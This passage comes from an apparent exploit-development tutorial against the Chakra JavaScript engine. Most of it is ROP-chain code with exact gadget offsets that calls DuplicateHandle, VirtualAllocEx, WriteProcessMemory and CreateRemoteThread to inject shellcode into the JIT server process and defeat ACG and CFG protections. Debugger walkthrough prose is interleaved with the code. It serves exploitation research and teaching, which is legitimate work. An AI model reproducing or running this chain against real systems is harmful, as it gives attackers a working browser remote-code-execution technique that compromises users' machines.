write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx decide where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return value (the address of our allocation) in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for the gadget below, which reads from the address at the +0x8 offset)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);      // 0x18028b4fe: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the chakra.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before that, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the thread HANDLE for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures the future cmp r8d, [rax] gadget dereferences a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write: the address of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Let’s now walk through this in the debugger. We again set a breakpoint on jmp rax and continue until we reach our call to CreateRemoteThread. From here we can use pt to execute this function call, pause at the ret, and view the first gadgets of our new WriteProcessMemory ROP chain.

If we look at the above WriteProcessMemory ROP chain, we start off by preserving the handle to the thread we just created in the .data section of kernelbase.dll (much like we preserved our VirtualAllocEx allocation). We can see this in action below (remember that CreateRemoteThread’s return value is the handle to the new thread. It is returned in RAX, so we can pull it directly from there):

After preserving the handle, we begin with our first parameter - nSize. Since we are just writing a pointer value, we specify 8 bytes (while dealing with the pesky cmp r8d, [rax] instruction):

Our function call is now in the following state:

WriteProcessMemory(
	-
	-
	-
	0x8,							// 64-bit pointer size (sizeof(QWORD))
	-
);
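
The padding writes that follow each add rsp, N ; ret gadget in the chain can be counted mechanically. Below is a minimal sketch, assuming every stack slot is 8 bytes wide. paddingSlots is a hypothetical helper for illustration and is not part of the exploit:

```javascript
// Hypothetical helper: number of 8-byte stack slots an `add rsp, N ; ret` gadget skips
function paddingSlots(addRspBytes) {
    if (addRspBytes % 8 !== 0) {
        throw new Error("stack adjustment must be a multiple of 8 bytes");
    }
    return addRspBytes / 8;
}

console.log(paddingSlots(0x28)); // slots skipped by the mov r9, rcx gadget
console.log(paddingSlots(0x48)); // slots skipped by the mov r8, rdx gadget
console.log(paddingSlots(0x38)); // slots skipped by the fake return address gadget
```

For the add rsp, 0x38 gadget, those slots are shared between the shadow space, the stack-passed parameters, and any leftover padding.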

The next parameter we will target is hProcess. This time we are not writing remotely, so we can simply use -1, or 0xFFFFFFFFFFFFFFFF. This is the pseudo handle GetCurrentProcess returns for the current process. It tells WriteProcessMemory to perform the write within the content process, where our VirtualProtect ROP chain lives and where our exploit is currently executing. We can simply write this value to the stack and pop it into RCX.

Our call is now in the following state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, where the exploit is executing)
	-
	-
	0x8,							// 64-bit pointer size (sizeof(QWORD))
	-
);
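
Because write64 takes its value as two 32-bit halves, the -1 pseudo handle is written as 0xffffffff, 0xffffffff. The split can be sketched with BigInt. Note that split64 is a hypothetical helper meant for a modern engine such as Node.js, not for use inside the exploit itself:

```javascript
// Hypothetical helper: split a 64-bit value into [low, high] 32-bit halves
function split64(value) {
    const v = BigInt.asUintN(64, BigInt(value)); // wrap negatives to unsigned 64-bit
    const lo = Number(v & 0xffffffffn);          // lower 32 bits
    const hi = Number(v >> 32n);                 // upper 32 bits
    return [lo, hi];
}

const [lo, hi] = split64(-1);
console.log(lo.toString(16), hi.toString(16)); // ffffffff ffffffff
```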

Next up is the lpBaseAddress parameter. This is where we want WriteProcessMemory to write our data. In this case, it is the placeholder location in the VirtualProtect ROP chain, which lives in the .data section of chakra.dll.

Our call is now in the following state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, where the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address within the VirtualProtect ROP chain (where we want to write the VirtualAllocEx_allocation address to)
	-
	0x8,							// 64-bit pointer size (sizeof(QWORD))
	-
);

The next item to take care of is lpBuffer. This memory address holds the contents we want to write to lpBaseAddress. Recall that earlier we stored our VirtualAllocEx allocation (our shellcode location in the remote process) in the .data section of kernelbase.dll. Since lpBuffer requires a pointer, we simply need to place the .data address of our stored allocation into R8.

Our call is now in the following state:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Pseudo handle to the current process (the content process, where the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address within the VirtualProtect ROP chain (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
	0x8,							// 64-bit pointer size (sizeof(QWORD))
	-
);

The last parameter, lpNumberOfBytesWritten, has to be passed on the stack, so we load WriteProcessMemory into RAX and write our NULL value directly to the stack.
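
To summarize where each argument ends up: the first four go in RCX, RDX, R8, and R9, and the rest go on the stack. Because the chain jumps into the function, the slot at RSP holds our fake return address, followed by 0x20 bytes of shadow space, which puts the fifth argument at RSP+0x28. The sketch below models that arithmetic only. placeArguments is an illustrative name and not something the exploit uses:

```javascript
// Hypothetical model of Windows x64 argument placement at the moment of `jmp rax`
function placeArguments(args) {
    const registers = ["RCX", "RDX", "R8", "R9"];
    const RETURN_SLOT = 0x8;     // fake return address sitting at RSP+0x0
    const SHADOW_SPACE = 0x20;   // four 8-byte home slots reserved for the callee
    return args.map((name, i) => {
        if (i < registers.length) {
            return { name, location: registers[i] };
        }
        // Stack-passed arguments start right after the return slot and shadow space
        const offset = RETURN_SLOT + SHADOW_SPACE + (i - registers.length) * 8;
        return { name, location: "RSP+0x" + offset.toString(16) };
    });
}

const layout = placeArguments([
    "hProcess", "lpBaseAddress", "lpBuffer", "nSize", "lpNumberOfBytesWritten"
]);
layout.forEach(a => console.log(a.name + " -> " + a.location));
```

Passing the seven DuplicateHandle parameters to the same function yields RSP+0x28, RSP+0x30, and RSP+0x38 for the last three, matching the comments in the chain.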

Here is our VirtualProtect ROP chain before the call (we are trying to update it at exploit runtime):

After (using pt to execute the call to WriteProcessMemory, which pauses execution on the ret):

As we can see, we successfully updated our ROP chain so that when the VirtualProtect ROP chain is eventually called, it is aware of where our shellcode is.
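
The effect of this call can also be modeled outside the debugger. The following is a toy sketch, not exploit code: memory is a plain Map keyed by address, and every address, value, and the writeProcessMemoryModel helper are made up for illustration. The point it shows is that lpBuffer is dereferenced, so the 8 bytes stored in the kernelbase.dll .data slot (the VirtualAllocEx allocation) land in the placeholder slot of the VirtualProtect ROP chain:

```javascript
// Toy memory: address (BigInt) -> 64-bit value (BigInt). All addresses are made up.
const memory = new Map();
const storageSlot = 0x7fff58cfa000n;      // stands in for the kernelbase.dll .data slot
const chainPlaceholder = 0x7ffc052ab100n; // stands in for the slot in the VirtualProtect ROP chain

memory.set(storageSlot, 0x1a0b0000n);     // pretend VirtualAllocEx returned this address
memory.set(chainPlaceholder, 0n);         // placeholder written when the chain was built

// Hypothetical model of an 8-byte WriteProcessMemory within a single process
function writeProcessMemoryModel(lpBaseAddress, lpBuffer, nSize) {
    if (nSize !== 8) throw new Error("this toy model only copies one QWORD");
    memory.set(lpBaseAddress, memory.get(lpBuffer)); // copy *lpBuffer to *lpBaseAddress
    return true;
}

writeProcessMemoryModel(chainPlaceholder, storageSlot, 8);
console.log("0x" + memory.get(chainPlaceholder).toString(16)); // 0x1a0b0000
```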

WriteProcessMemory ROP Chain (Round 3)

This ROP chain is identical to the above ROP chain, except for the fact we want to overwrite a placeholder for the “fake return address” after our eventual call to VirtualProtect. We want VirtualProtect, after it is called, to transfer execution to our shellcode. This can be seen in a snippet of our VirtualProtect ROP chain.

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
inc();
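
The bookkeeping in this snippet amounts to remembering where a placeholder lives so it can be patched later. Here is a simplified sketch, in which the chain is modeled as an array of 8-byte slots instead of writes into the .data section. chain, emit, and patch are hypothetical names, and the patched value is made up:

```javascript
// Simplified model: the ROP chain is an array of 8-byte slots
const chain = [];

// Append one slot and return its byte offset from the start of the chain
function emit(value) {
    chain.push(value);
    return (chain.length - 1) * 8;
}

emit("earlier gadgets ...");        // stand-in for the rest of the chain
const ropoffsetTwo = emit(0n);      // placeholder slot, offset remembered for later
emit("push rdi ; ret");             // gadget that follows the placeholder

// Patch a previously recorded placeholder once the real value is known
function patch(offset, value) {
    chain[offset / 8] = value;
}

patch(ropoffsetTwo, 0x1a0b0000n);   // made-up shellcode address
console.log(ropoffsetTwo, chain[1].toString(16)); // 8 1a0b0000
```

In the exploit itself the patch cannot happen from JavaScript, since the allocation address only exists once the ROP chain is running, which is why a WriteProcessMemory call does the patching instead.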

We need to reconcile this, just like we did in our last WriteProcessMemory call, where we dynamically updated the ROP chain. Again, we need to use another call to WriteProcessMemory to update this last location. This will ensure our eventual VirtualProtect ROP chain is good to go. We will omit these steps, as it is all documented above, but I will still provide the updated code below.

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Pseudo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

